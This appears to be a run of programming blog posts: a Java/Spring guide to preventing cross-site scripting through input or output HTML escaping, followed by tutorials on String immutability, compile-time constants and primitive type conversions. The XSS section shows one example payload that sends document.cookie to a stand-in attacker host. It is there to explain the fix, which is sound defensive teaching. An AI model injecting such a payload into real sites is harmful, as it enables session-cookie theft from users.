Java/Spring web applications security: XSS

I recently worked on a Java and Spring based web application for a client in retail banking. Obviously, security was a prime concern and we had to take special care to plug any holes. In this series, I will present some of the most important security concerns that every internet facing application must (ideally) handle. I will also give the solutions for a Java + Spring MVC based web application.

In this part, I discuss XSS (cross-site scripting, also known as script injection) attacks and the ways around them.

Cross-site Scripting

Cross-site scripting (XSS) is a type of vulnerability that allows attackers to inject malicious client-side scripts, e.g. JavaScript, into web sites. These malicious scripts are injected through the form inputs on the site. For example, a site could have a text input that allows the user to enter a product to search for. An attacker can enter a malicious script into that form field. If the search fails, as it should since there is no such product, an error message might be displayed containing the entered search string, telling the user that no such product was found. Bang! The attacker rejoices. The malicious script gets executed when the browser displays the search string as part of the error message, because the script simply becomes embedded in the output HTML.
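
To make this concrete, here is a hypothetical illustration (the payload and the markup are made up). Suppose the attacker types the following into the search box:

<script>document.location='http://evil.example/steal?c='+document.cookie</script>

If the error page echoes the search string unescaped, the generated HTML ends up containing something like:

<p>No product found matching: <script>document.location='http://evil.example/steal?c='+document.cookie</script></p>

and the browser happily executes the script while rendering the page.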

The Solution: HTML escaping

The basic principle to follow in order to tackle this kind of attack is to apply full HTML escaping to the form input: convert all special characters into their corresponding HTML entity references (e.g. < into &lt;) as defined in the HTML 4.01 recommendation. Script injection attacks work because the script becomes embedded in the HTML and gets executed by the browser when the HTML is rendered. After escaping, the script is no longer a valid script and gets embedded as plain text.
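
As a quick sanity check of what full HTML escaping produces, here is a minimal sketch using Spring’s HtmlUtils.htmlEscape (the surrounding class is just scaffolding for the demo):

import org.springframework.web.util.HtmlUtils;

public class EscapeDemo {
    public static void main(String[] args) {
        String input = "<script>alert(\"xss\")</script>";
        // Every HTML special character is replaced by its entity reference
        String escaped = HtmlUtils.htmlEscape(input);
        System.out.println(escaped);
        // should print: &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
    }
}

The escaped string is rendered by the browser as the literal text the user typed, not as markup.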

There are two approaches to the implementation of the above principle depending on exactly when the HTML escaping is applied.

Approach#1: Escaping of Input

In the first approach, the escaping is applied at input time, when the form field values are bound to the form backing beans in the application. Since the HTML escaping gets applied to the incoming data, the application sees and stores the values in their escaped form. When these values are displayed back on the site’s pages, there is no longer a risk of a malicious script executing, since the escaped script is no longer a valid script. The text gets rendered just as it was entered.

When building a Spring MVC application using Spring’s SimpleFormController, an easy way to do this is to hook into the form binding process. First, define a class that extends java.beans.PropertyEditorSupport and takes care of converting form input strings to the corresponding backing-bean field values and vice versa. You’ll need to override two methods, setAsText and getAsText, as follows.

import java.beans.PropertyEditorSupport;
import org.springframework.web.util.HtmlUtils;

public class HtmlEscapeStringEditor extends PropertyEditorSupport {
	@Override
	public void setAsText(String text) throws IllegalArgumentException {
		String out = "";
		if(text != null)
			out = HtmlUtils.htmlEscape(text.trim());

		setValue(out);
	}

	@Override
	public String getAsText() {
		String out = (String) getValue();
		if(out == null)
			out = "";
		return out;
	}
}

It’s pretty straightforward. I used the HTML escaping method provided by the Spring framework’s HtmlUtils class, which supports full HTML escaping. This is also a very good place to put the trimming logic, so that all input values are automatically trimmed before being bound to the form backing object.

Next, to hook this property editor into the binding process, override the initBinder method in your form controller (the class that extends SimpleFormController) and register this editor.

@Override
protected void initBinder(HttpServletRequest request, ServletRequestDataBinder binder) throws Exception {
	binder.registerCustomEditor(String.class, new HtmlEscapeStringEditor());
}

This can be conveniently placed in the base form controller class of your application, if there is one, from which all other form controllers extend. That’s all there is to it.

Approach#2: Escaping of output

With the previous approach, the values get stored in the application model and the persistence layer in their escaped form. Sometimes this may not be the desired behavior. In such cases, we can take a second approach where we don’t process the input at all and store the values as-is. The HTML escaping is applied when rendering the values back on a page.

Spring framework directly supports this at three different levels:

  • Application level

HTML escaping for all Spring tags can be turned on at the application level by specifying a context parameter named defaultHtmlEscape in the web.xml and setting it to true:

<context-param>
	<param-name>defaultHtmlEscape</param-name>
	<param-value>true</param-value>
</context-param>

If the value is specified as false, no escaping will be applied to any of the tags. Note that the default behavior, when no defaultHtmlEscape context parameter is defined, is to apply HTML escaping to the Spring tags in the form tag library (which render values), but not to the other Spring tags that merely expose values without rendering them.

  • Page level

Spring can be asked to turn on/off HTML escaping for all form tags on a specific page by using a Spring tag declaration at the top of the page:

<spring:htmlEscape defaultHtmlEscape="true" />

Only the form tags declared after the above tag declaration will use HTML escaping. If we want it to apply to all the tags on the page, it should be declared before all of them.

  • Tag level

Spring can be asked to turn HTML escaping on/off for a specific form tag by setting the htmlEscape attribute of the form tag to true:

<form:input path="name" htmlEscape="true" />

Which approach to take?

Which approach you should take depends on the kind of application you are developing. Can your application afford to store form inputs exactly as they were entered, or might even that be risky? It could be risky because of the ways the data is used elsewhere in the application. Thus, escaping at input time provides somewhat better security. On the other hand, in some cases it may be desirable to store values as-is because of some dependency, in which case you will escape at output time. Note that even if you decide to escape at input time, you can always unescape the data before it is used elsewhere in the application, if need be. However, it must never be unescaped on its way to the JSPs; that’s the whole idea.

Now a *caveat*: In most applications, JSP pages are built by mixing Spring’s form tags with the standard JSTL tags as well as JSP 2.0’s embedded ${...} expressions. While the JSTL <c:out> tag performs XML escaping (which is sufficient for most modern browsers), the embedded ${...} expressions do not perform any kind of escaping! So apart from using the mechanisms described above to perform HTML escaping for Spring’s form tags, any embedded use of ${...} must be replaced with <c:out value="${...}"/> in order to guard against XSS attacks!
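
For instance, a page fragment like the following (a hypothetical example; the variable name is made up) would need to be changed from:

<p>No product found matching: ${searchString}</p>

to:

<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
<p>No product found matching: <c:out value="${searchString}"/></p>

since <c:out> escapes XML special characters by default (its escapeXml attribute defaults to true).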

Why are Strings immutable?

String in Java represents an immutable sequence of characters. When a String object is created, its value must be specified, and it is then set in stone. Behind the scenes, a character array of exactly the required size is created and initialized. The String class does provide methods that seem to manipulate the value represented by the String object, e.g. replace(), substring(), toUpperCase(). These methods, however, don’t modify the object on which they are invoked; they return a new String object representing the modified value.

String s = "Immutable";
s.toUpperCase();
System.out.println("s: " + s);

prints:

s: Immutable

Why are Strings immutable? The simplest answer is: because they were designed to serve as value objects. They represent the value they hold; you need a different object if you want a different value. But why were Strings designed to serve as value objects? Strings are most commonly used as constants, and sometimes critical operations depend on the assumption that the value of a String will not change behind their back. In other words, they need the String to be a value object. The StringBuilder and StringBuffer classes offer mutable strings if you need them. Let’s look at cases where immutability of strings is required, as well as how it benefits us generally.
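
As a small sketch of the difference, a StringBuilder mutates the same object in place, whereas String methods hand back new objects:

StringBuilder sb = new StringBuilder("Hello");
sb.append(", world");           // modifies the existing StringBuilder object
System.out.println(sb);         // prints: Hello, world

String s = "Hello";
String t = s.concat(", world"); // returns a brand new String; s is untouched
System.out.println(s);          // prints: Hello
System.out.println(t);          // prints: Hello, world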

1. Security

Security demanded String to be a value object. Here’s what James Gosling, the father of Java, has to say:

One of the things that forced Strings to be immutable was security. You have a file open method. You pass a String to it. And then it’s doing all kind of authentication checks before it gets around to doing the OS call. If you manage to do something that effectively mutated the String, after the security check and before the OS call, then boom, you’re in. But Strings are immutable, so that kind of attack doesn’t work. That precise example is what really demanded that Strings be immutable.

2. Performance

Strings are widely used as constants. The Java compiler, javac, which is itself written in Java, uses Strings heavily during its operation. Making String immutable provides the opportunity to optimize String’s implementation to perform well under such usage.

After an object is passed to a method, if the method wants to be sure that nobody else who has a reference to the same object will change its value while the method is using it, the method has to make a local copy of the object. This adds memory as well as CPU overhead. But since Strings are immutable, there’s no need to do this when dealing with Strings.

Also, multiple threads can share Strings without needing any synchronization overhead. Since Strings are immutable, there can be no race conditions.

3. Caching

Immutable objects can be cached, thereby saving memory. The String class indeed maintains a cache of all String objects created using literals. This is called interning.

String s1 = "Java";
String s2 = "Java"
System.out.println("s1 == s2: " + (s1 == s2));

prints:

s1 == s2: true

Both s1 and s2 were created using String literals and point to the same object which exists in the String cache.

Using the new operator to create a String forces creation of a new String object. However, the intern() method of String class returns the cached String object with the same value i.e. the interned object:

String s1 = "Java";
String s2 = new String("Java");
String s3 = s2.intern();

System.out.println("s1 == s2: " + (s1 == s2));
System.out.println("s1 == s3: " + (s1 == s3));

prints:

s1 == s2: false
s1 == s3: true

Why would you want to use interned Strings apart from the memory advantage they provide? One interesting consequence of interning is that Strings can be tested for value equality simply by testing the equality of the object references. So you can replace costly equals() comparisons with cheap == comparisons. This can be a huge advantage, for example, in algorithms that need to make lots of String comparisons.
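
As a small (contrived) sketch, once all the Strings involved are known to be interned, == can stand in for equals():

String[] words = { "java", "scala", new String("java"), "kotlin" };
String target = "java";            // a literal, hence already interned
int count = 0;
for (String w : words) {
    // intern() maps each value to its single cached instance,
    // so reference equality is equivalent to value equality here
    if (w.intern() == target) {
        count++;
    }
}
System.out.println("count: " + count); // prints: count: 2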

Compile-time constants – conditional compilation and other applications

First of all, what exactly is a constant in Java? A constant in Java is really an immutable variable: a variable that, once initialized, is not allowed to change its value throughout its lifetime. You declare such a variable using the final modifier and set it to its constant value using an initializer expression. Once initialized, its value is final, i.e. can’t be changed. The initializer expression can be any type-compatible expression. However, the constant assumes a special significance when it is initialized with a special type of expression called a constant expression: an expression consisting solely of primitive-type/String literals and/or other compile-time constants. The special status of such expressions comes from the fact that they get evaluated at compile-time by the compiler itself. So the values of final variables initialized with constant expressions are known at compile-time, and hence they are called compile-time constants. Here are some examples:

final static int a = 5;
final static int b = a;
final static double c = 4.0 + 5.0 * 10.0;
final static double d = 10.0 * c;
final static boolean e = true;

All of the above variables are compile-time constants since they get initialized with constant expressions.

static int f = 10;
final static int g = f;
final static boolean h = method();
final static double i;
static { i = 100.0; }

None of the above is a compile-time constant: f is not declared final; the initializer expression for g is not a constant expression (since f is not a compile-time constant); h has been initialized with a method call (a method call is not a constant expression even if the method simply returns a literal); and i has not been initialized with an initializer expression (it uses a static initializer block). Let’s look at another example with local final variables:

void myMethod()
{
    final int x = 10;
    final int y;
    y = 10;
}

In the above piece of code, x is a compile-time constant. y, however, is not a compile-time constant since it has not been initialized with an initializer expression. Note that initialization using an initializer, i.e. with an expression on the same line as the declaration, is an essential condition for the variable to be treated as a compile-time constant by the compiler.

So we can now distinguish compile-time constants from others, but what’s their significance, you might be wondering. Well, it’s simple: their value is evaluated at compile-time (as opposed to run-time). The compiler knows their value and takes full advantage of it. It uses this information for many purposes, including making certain code optimizations and providing the ability to achieve conditional compilation. A summary of the most useful of these uses is given below; a knowledge of all of them is nice to have.

1. Inlining

The compiler replaces all the references to such variables by the literal value itself. This is also referred to as inlining. For example, the code

class A
{
    static final int x = 100;
}

class B
{
    static void m()
    {
        int a = A.x;
    }
}

gets compiled into the following code (the bytecode equivalent of the following code, to be precise):

class A
{
    static final int x = 100;
}

class B
{
    static void m()
    {
        int a = 100; // A.x is compiled into literal 100
    }
}

You can easily verify this by decompiling the class file using a Java decompiler. This optimized code is obviously faster as it avoids run-time reference value resolution.

So far so good. Now the *caveat*: after compilation, any code that refers to a compile-time constant refers to its value directly. If you later change the value of the original constant, code that refers to the constant will continue to use the old value until it is recompiled. So all files that refer to the constant must be recompiled; just recompiling the file that contains the definition of the constant is not sufficient. This is the default behavior, so you should be careful.

2. Code Reachability Analysis for while and for blocks

The compiler does a flow analysis of the code to make sure all code is reachable and duly flags any unreachable code as an error. While analyzing while and for code blocks, the compiler assumes all the code within the block to be reachable provided the block itself is reachable. However, if the boolean condition of the while or for block is a compile-time constant or a constant expression, the compiler is able to evaluate the condition and make a more informed decision: if it evaluates to true, all’s well; if it evaluates to false, the code within the block is unreachable and is flagged as an error. Note that if the conditional expression is not a constant expression, the compiler can’t evaluate it and assumes the code within the block to be reachable, even if at runtime the condition evaluates to false.

void method()
{
    boolean cond = false; // not compile-time constant
    while (cond) // (1)
        doSomeStuff(); // (2) unreachable but assumed to be reachable
}

In the above code, the condition at (1) evaluates to false at runtime making the code at (2) unreachable. However, the compiler does not detect this and the code compiles.

void method()
{
    final boolean cond = false; // compile-time constant
    while (cond)
        doSomeStuff(); // unreachable; compilation error
}

Now the compiler can sniff out the unreachable code and won’t let the code compile! We looked at the flow analysis for while and for. What about an if block? We’ll look at that next.

3. Conditional Compilation

You might be familiar with the way conditional compilation works in C/C++ programs using preprocessor directives – #define and #ifdef. In Java, however, there is no preprocessor involved in the compilation process. So how do we achieve conditional compilation in Java?

The Java compiler provides direct support for conditional compilation with the help of constant expressions and compile-time constants. Do this: wrap the code that you want to compile conditionally inside an if statement, use a boolean compile-time constant or a constant expression as the condition, and, well, that’s about it! Based on the value (true or false) of the condition, the compiler will include or exclude the body of the if statement in the output bytecode.

static final boolean DEBUG = false;
int add(int a, int b)
{
    if (DEBUG)
        System.out.println("Adding " + a + " and " + b); // (1)

    int result = a + b;
    return result;
}

We defined a compile-time constant called DEBUG and simply used it as an if condition. The compiler compiles the body of if conditionally. Since DEBUG is set to false, the compiler does not include line (1) in the compiled bytecode.

You might have expected the compiler to actually generate a compilation error on line (1), determining it to be unreachable, quite along the same lines as the treatment given to a while or for statement (see the previous subsection). However, an if is treated differently from a while or for statement:

  • If the if condition is not a constant expression, the if statement is compiled as it is
  • If the condition expression is a constant expression, its value is considered
    • If the value is true, the entire if statement (along with the else clause, if present) is replaced by the body of the if clause in the compiled bytecode
    • If the value is false, the entire if statement is replaced by the body of the else clause if one is present, or by an empty statement if no else clause is present

Thus the above code gets compiled into bytecode equivalent to the following code:

static final boolean DEBUG = false;
int add(int a, int b)
{
    int result = a + b;
    return result;
}

If, however, DEBUG is changed to true, it will result in the following:

static final boolean DEBUG = true;
int add(int a, int b)
{
    System.out.println("Adding " + a + " and " + b); // (1)

    int result = a + b;
    return result;
}

As the Java Language Specification puts it:

The rationale for this differing treatment is to allow programmers to define “flag variables” such as:

static final boolean DEBUG = false;

and then write code such as:

if (DEBUG) { x=3; }

The idea is that it should be possible to change the value of DEBUG from false to true or from true to false and then compile the code correctly with no other changes to the program text.

Note that the code that doesn’t make it into the compiled bytecode must still be valid, compilable code; otherwise the compiler will give an error.

Usage scenarios:

Some of the common use cases for the use of conditional compilation are:

  • We want to use debugging or logging statements during development but don’t want them compiled into the production binary, for example because the size of the binary is a concern for us
  • We want to omit assertion-related code from production binaries. Of course, we can enable or disable assertions while starting the application, but even when assertions are disabled, the assertion code is still present in the binary
  • We want to comment out a large chunk of code, but we can’t wrap it inside a /* */ style comment block because it already contains some /* */ style comments and comments can’t be nested. We also don’t want to trouble ourselves with commenting each and every line with a // style comment (see the sketch below)

Note that the common use case for conditional compilation in C/C++ programs i.e. to compile based on platform being used isn’t required in Java since Java code should run on any platform without changes.
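
For the last scenario in the list above, a minimal sketch could look like this:

void process()
{
    if (false) // the whole block is dropped from the compiled bytecode
    {
        System.out.println("debug step 1"); /* old comments inside are fine */
        System.out.println("debug step 2");
    }
    System.out.println("real work");
}

The disabled block must still be valid, compilable code, as noted above, but it never makes it into the class file.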

4. Definite Assignment Analysis

The Java compiler does code-flow analysis and makes sure that

  • whenever a final field or a local variable f is accessed, f is definitely assigned before the access; otherwise a compile-time error must occur
  • whenever there is an assignment to a final variable, the variable is definitely unassigned before the assignment; otherwise a compile-time error must occur

In doing this analysis for if, for and while statements, it takes only the structure of statements into account and ignores the values of expressions if the expressions are not constant expressions. However, when the expressions are constant expressions, it is able to make a more informed decision based on the value of the expressions. Let us look at some examples:

int weight = 10;
int price;
if(weight < 50) price = 1000; // (1)
if(weight > 50) price = 5000;
System.out.println("Price is: " + price); // (2) error

The compiler only looks at the structure of the statements and ignores the values of the expressions since they are not constant expressions. It sees two ifs and can’t be sure that one of them will always be taken. It concludes that the variable price may not have been initialized before the access at (2) and produces an error, even though we can see that at run-time the if at (1) will be taken.

final int weight = 10;
int price;
if(weight < 50) price = 1000; // (1)
if(weight > 50) price = 5000;
System.out.println("Price is: " + price); // (2) compiles successfully

Now weight is a compile-time constant. Both the if conditions are constant expressions and the compiler is able to evaluate them to see that the if at (1) will be taken and so price will definitely get assigned before the access at (2). So the code compiles successfully.

5. Class Initialization

When a class is loaded and initialized, all static fields are first initialized to a default initial state based on their Java types. This is followed by the execution of field declarations and initializations in the order they appear in the class definition. During this phase, if the initializer expression of a field tries to read another field that has not yet been declared and initialized (for example through a this reference or via a method call), the referred field will be read in its default initial state.

Compile-time constants are, however, privileged. They are the first to get initialized among all declared class variables, irrespective of their actual declaration order. This means that they get set to their initialized state before any other initializer executes and gets a chance to read them. They never appear in their default initial state to any code. Let’s consider the program below.

class A
{
    static int a = init(); // a = 0
    static int b = 10;
    static int init()
    {
        return b;
    }
}

In the above code, a is initialized by a method call to init which reads and returns the value of field b. b has not been declared/initialized at this moment (since its declaration appears after a) and so its value is the default initial value for int type i.e. 0. So a gets the value 0.

Now let’s make b a compile-time constant by declaring it final:

class A
{
    static int a = init(); // a = 10
    static final int b = 10;
    static int init()
    {
        return b;
    }
}

Now b gets initialized to its value 10 before the rest of the non-final static fields’ initializers are executed and so its value always appears to be 10. So a gets the value 10.

6. Implicit Narrowing Type Conversions

Narrowing conversions usually require an explicit cast. However, when the right-hand side expression is a constant expression or a compile-time constant and certain other conditions are satisfied (for a full discussion, see this post), such conversions can happen implicitly without the need for an explicit cast. For example, the following code compiles fine:

final int a = 10;
byte b = a; // (1) a is compile-time constant

In the above code, an implicit type conversion from int to byte takes place at (1) since a is a compile-time constant. If, instead, a were not final, the conversion would require an explicit cast:

int a = 10;
byte b = (byte) a; // a is not a compile-time constant

7. switch Labels

switch labels must all be constant expressions or compile-time constants. Since the compiler can evaluate these expressions, it can make sure that all case labels in a switch block are unique.
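
As a small sketch, the case labels below are compile-time constants, which lets the compiler verify that no two labels have the same value (a duplicate would be a compile-time error):

class Status
{
    static final int LOW = 1;
    static final int HIGH = 2;

    static String describe(int level)
    {
        switch (level)
        {
            case LOW:  return "low";    // constant expression label
            case HIGH: return "high";   // must be unique within the switch
            default:   return "unknown";
        }
    }
}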

8. Evaluation of floating-point type constant expressions

All floating-point type constant expressions are evaluated by the compiler using FP-strict computations even if the context is otherwise non-FP-strict. This ensures that floating-point type compile-time constants are guaranteed to have the same exact value under different JVMs.

Primitive Type Conversions

Type conversions between primitive types in Java can be broadly categorized as follows:

  1. Widening conversions
  2. Implicit narrowing conversions
  3. Narrowing conversions requiring explicit cast
  4. Numeric promotion

Only numeric types can participate in type conversions. These types include the integer types char, byte, short, int and long and the floating-point types float and double. boolean is not type-compatible with any other primitive data type i.e. boolean values can’t be converted to other primitive types and vice-versa.

The table that follows presents a summary of the sizes and bit representations of these types, that will go a long way in understanding the conversions better.

Type     Size and bit representation
char     16 bits; unsigned; Unicode UTF-16
byte      8 bits; signed; 2’s complement
short    16 bits; signed; 2’s complement
int      32 bits; signed; 2’s complement
long     64 bits; signed; 2’s complement
float    32 bits; IEEE 754-1985
double   64 bits; IEEE 754-1985

Widening and Narrowing

A type conversion is termed widening when it occurs from a narrower data type to a broader data type. Narrower and broader here mean that the set of valid values of the narrower type is a subset of that of the broader type. The picture below shows the widening conversions; the direction of the arrows represents the direction of widening.

Figure 1: Widening primitive conversions

All other conversions are termed narrowing as they convert a wider type to a narrower type. Note that conversions between char and byte/short are narrowing. byte is a smaller type (8 bits); short is the same size as char (both are 16 bits), but short is signed whereas char is unsigned, so neither type can represent the full range of the other.

Let’s now look at the conversions and the contexts in which they can occur in more detail.

1. Widening conversions

Widening conversions are done implicitly and don’t require a cast. A cast, though redundant, can still be used. Let’s look at the following assignments.

int a = 5;
long b = a; //(1)
long c = (long) a; //(2)

At (1), int is implicitly converted to a long. At (2), int is converted to a long using a redundant but valid cast.

Resulting value:

Since the destination type, being broader, can hold all values in the range of the source type, there is no loss of magnitude. However, there can be a loss of precision when the source type is an integer type and the destination type is a floating-point type. Although the range of magnitudes of floating-point types is larger than that of any integer type, floating-point types store only a limited precision, which may result in loss of the least significant digits. Let’s consider the following example.

long x = 12345676899L;
float y = x; // (1)
System.out.println("y = " + y);

outputs:

y = 1.23456768E10

The widening conversion at (1) results in a loss of precision, as is evident from the output.

Context:

A widening conversion can occur in the context of assignment as well as parameter passing during method invocation. Numeric Promotion, discussed in section 4 below, is actually a special form of widening conversion that occurs under some specific conditions as we’ll see.

Mechanism:

A widening conversion between integer types is done by extending the sign (leftmost) bit into the newly added higher-order bits. This preserves the original value as per 2’s complement notation. A widening conversion from a char to an integer type is done by setting the new higher-order bits to zero. Conversion from integral to floating-point values involves a conversion from 2’s complement to IEEE 754-1985 notation.
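
A small sketch of both mechanisms (reusing the value 130 that appears again later in this post):

byte b = (byte) 130;   // bit pattern 10000010, i.e. -126
int i = b;             // widening: the sign bit is copied into the 24 new high-order bits
System.out.println(i);                          // prints: -126
System.out.println(Integer.toBinaryString(i));  // prints: 11111111111111111111111110000010

char c = 'A';          // bit pattern 0000000001000001, i.e. 65
int j = c;             // widening from char: the 16 new high-order bits are set to zero
System.out.println(j);                          // prints: 65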

2. Implicit narrowing conversions

Narrowing conversions can occur implicitly when all of the following conditions are satisfied:

  1. The source value is a constant expression i.e. an expression involving only literals or compile-time constants
  2. The source type is one of byte, char, short or int
  3. The destination type is one of byte, char or short
  4. The source value is within the valid range of values for the destination type

For example, we can assign an int value to a byte or short variable without needing a cast if the source expression is a constant expression and the value of the expression is within the valid range for the destination variable’s type.

int x = 12;
final int y = 12;
byte a = 12; // (1) OK
byte b = y; // (2) OK
// byte c = 130; // (3) Not OK
// byte d = x; // (4) Not OK

In the code above, the assignment at (1) results in an implicit conversion from the int literal 12 to byte since 12 is a constant expression and is within the range of the byte type. The assignment at (2) also works since y is a constant expression. The assignment at (3) does not compile since the source value is outside the valid range for the byte type. The assignment at (4) doesn’t compile since the source is not a constant expression. The assignments at (3) and (4) require an explicit cast to compile, as we’ll see in the next section.

Context:

An implicit narrowing conversion can occur only during assignments and not during method invocation. The reason for this restriction is to simplify the process of binding a method invocation to a method definition in case of method overloading.

Mechanism:

A narrowing conversion is done by discarding the higher-order extra bits in the 2’s complement bit representation of the source value. For example, in a conversion from int to short, the higher-order (i.e. leftmost) 16 bits are discarded and the remaining 16 bits constitute the new short value. Since, for an implicit narrowing conversion, the source value is within the range of the destination type, the discarded bits are all 0s (for a positive value) or all 1s (for a negative value). Thus discarding the extra higher-order bits affects neither the magnitude nor the sign when the destination type is short or byte. When the destination type is char, the resulting bit pattern is interpreted as an unsigned UTF-16 char value.

Resulting value:

Since a pre-requisite for an implicit narrowing conversion is that the source value be within the valid range of the destination type, such conversions don’t result in any loss of information.

3. Narrowing conversions requiring explicit cast

Any narrowing conversion that does not satisfy the conditions for an implicit conversion requires an explicit cast. For example, the assignments at (3) and (4) in the code above can be rewritten with an explicit cast to remove the compilation errors:

byte c = (byte) 130; // (5) OK
byte d = (byte) x; // OK

Context:

An explicit narrowing conversion can occur during assignments and parameter passing.

Mechanism:

The narrowing between integer types is done as described in the previous section. Narrowing from floating-point to integer types involves conversion from IEEE 754-1985 to 2’s complement notation.

Resulting value:

When the source value is outside the range of the destination type, the discarded bits actually contributed to the magnitude of the original value, and hence there is a loss of magnitude. Also, the highest-order (leftmost) bit of the resulting value is interpreted as the sign bit as per 2’s complement notation. This may differ from the highest-order bit of the original value, and hence the sign of the value may change. For example, if we print the value of the variable c declared at (5) above:

System.out.println("c = " + c);

the output is:

c = -126

At (5), c is assigned the int literal 130, whose bit pattern is 00000000000000000000000010000010. Discarding the 24 high-order bits results in 10000010, which is -126 when interpreted as per 2’s complement notation. Both the magnitude and the sign changed.

Both the char and short types are 16 bits; however, char is unsigned whereas short is signed. Conversions between them can therefore also result in loss of information.
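
A small sketch of such a loss (the 16-bit pattern is simply reinterpreted):

short s = -1;                 // bit pattern 1111111111111111
char c = (char) s;            // same 16 bits, now read as an unsigned char
System.out.println((int) c);  // prints: 65535

char d = 50000;               // a valid char value, but outside the short range
short t = (short) d;
System.out.println(t);        // prints: -15536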

Floating-point values get truncated towards zero (the fractional part is discarded) when converted to integer types. For example,

float x = 12.5F;
int y = (int) x;
System.out.println("y = " + y);

outputs:

y = 12

When the floating-point value is outside the range of the destination integer type, the result is that type’s minimum or maximum value (e.g. Integer.MIN_VALUE or Integer.MAX_VALUE when converting to int); a NaN converts to 0.

Conversion from double to float can also result in loss of magnitude as well as precision. Specifically, double values whose magnitude is too large for the float type result in +Infinity or -Infinity, and double values whose magnitude is too small result in +0.0 or -0.0.
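
A small sketch of these edge cases:

float big = 1.0e20F;
System.out.println((int) big);    // prints: 2147483647 (Integer.MAX_VALUE)
System.out.println((int) -big);   // prints: -2147483648 (Integer.MIN_VALUE)

double huge = 1.0e300;
System.out.println((float) huge); // prints: Infinity

double tiny = 1.0e-300;
System.out.println((float) tiny); // prints: 0.0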

4. Numeric promotion

Numeric promotion is a widening conversion that applies implicitly to the operands of numeric operators under specific contexts. There are two types of numeric promotions:

  1. Unary numeric promotion applies to the operand of a unary operator or to the individual operands of a binary operator. The rule states that if the type of the operand is narrower than int, then it is converted to int; otherwise it is not changed. Unary numeric promotion is applied to the following:
    • Operand of the unary + and - operators and the bitwise complement operator ~
    • Each individual operand of the binary shift operators <<, >> and >>>
    • Size expression in array creation using “new arr[size]” and index expression in array element access using “arr[index]”
  2. Binary numeric promotion applies to the operands of a binary numeric operator taking both the operands into account together. The rule states that if T is the broader type of the types of the two operands, then both the operands are converted to int if T is narrower than int, otherwise both are converted to T. Binary numeric promotion is applied to the following:
    • Operands of arithmetic operators +, -, *, /, %
    • Operands of relational operators <, <=, >, >= and equality operators == and !=
    • Operands of integer bitwise operators &, ^ and |

Numeric promotion is applied during the evaluation of an expression. After the evaluation, implicit or explicit type conversions may be required for the assignment of the evaluated value to a variable. For example,

short a = 10;
short b = (short) (a + 10); // (1)

At (1) above, binary numeric promotion occurs during the evaluation of a + 10: a‘s value is widened to int and the int 10 is added. The result is an int value of 20, which requires an explicit cast to short before it can be assigned to the short variable b. Let’s look at another example:

float a = 12.5F;
int b = 5;
byte c = 10;
float d = a * ( b + c ); // (1)

Evaluation of a * ( b + c ) at (1) above proceeds as follows (in terms of types):

float * ( int + byte )
=> float * ( int + ( byte => int ) )
=> float * ( int + int )
=> float * int
=> float * ( int => float )
=> float * float
=> float

Compound assignment operators (+=, -=, *=, /=, %=) and the unary increment/decrement operators (++, --) apply a cast implicitly. For example, for an initialized byte variable a:

a = (byte) (a + 10); // requires explicit cast
a += 10; // doesn't require a cast; cast is implicit
a = (byte) (a + 1); // requires explicit cast
a++; // doesn't require a cast; cast is implicit

Context:

A numeric promotion occurs during the evaluation of an expression.

Mechanism:

A numeric promotion is a widening conversion and uses the same mechanism as a normal widening conversion.

Effect on resulting value:

There is no loss of information during a numeric promotion.

Other types of conversions involving primitive types

  1. Boxing/unboxing: Boxing and unboxing refer to the implicit conversions from primitive types to the corresponding wrapper types and vice-versa. Such conversions occur automatically in the context of both assignment and parameter passing.
  2. String concatenation: The + operator is overloaded to work with String operands to effect concatenation. When one of the operands of + is a String, the operator works as the concatenation operator, resulting in another String. If the other operand is not a String, it automatically gets converted to a String before the concatenation is applied. For primitive types, the converted String is a string representation of the operand’s value; for references, the String is obtained by calling the toString() method on the operand.
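
A small sketch of both conversions (the Date is just an arbitrary reference type):

Integer boxed = 42;                 // boxing: int -> Integer in an assignment context
int unboxed = boxed;                // unboxing: Integer -> int

java.util.Date now = new java.util.Date();
// The primitive is converted to its string representation;
// the reference is converted by calling its toString() method
String msg = "count=" + unboxed + " at " + now;
System.out.println(msg);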